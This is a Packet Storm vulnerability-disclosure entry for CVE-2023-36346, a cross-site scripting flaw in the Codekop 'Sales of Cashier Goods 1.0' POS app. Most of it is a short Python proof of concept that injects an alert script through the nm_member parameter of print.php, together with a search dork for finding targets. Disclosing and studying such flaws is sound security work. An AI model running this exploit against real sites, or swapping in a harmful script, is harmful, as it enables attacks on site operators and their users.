Lucene search
Amirhossein BahramizadehPACKETSTORM:173280HistoryJul 03, 2023 - 12:00 a.m.
Sales Of Cashier Goods 1.0 Cross Site Scripting
2023-07-0300:00:00
Amirhossein Bahramizadeh
packetstormsecurity.com
58
web applications
iran
codekop
php
mysql
windows/linux
cve-2023-36346
alert
payload
request parameters
response
0.001 Low
EPSS
Percentile
43.7%
`# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346
import requests
import urllib.parse
# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"
# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)
# Build the request parameters
params = {
"nm_member": payload
}
# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)
`
Related
nuclei
nuclei
POS Codekop v2.0 - Cross Site Scripting
2023-07-07 09:38:49
nvd
nvd
CVE-2023-36346
2023-06-23 20:15:09
cve
cve
CVE-2023-36346
2023-06-23 20:15:09
cvelist
cvelist
CVE-2023-36346
2023-06-23 00:00:00
prion
prion
Cross site scripting
2023-06-23 20:15:00
zdt
zdt
Sales of Cashier Goods v1.0 - Cross Site Scripting Exploit
2023-07-04 00:00:00
exploitdb
exploitdb
Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
2023-07-03 00:00:00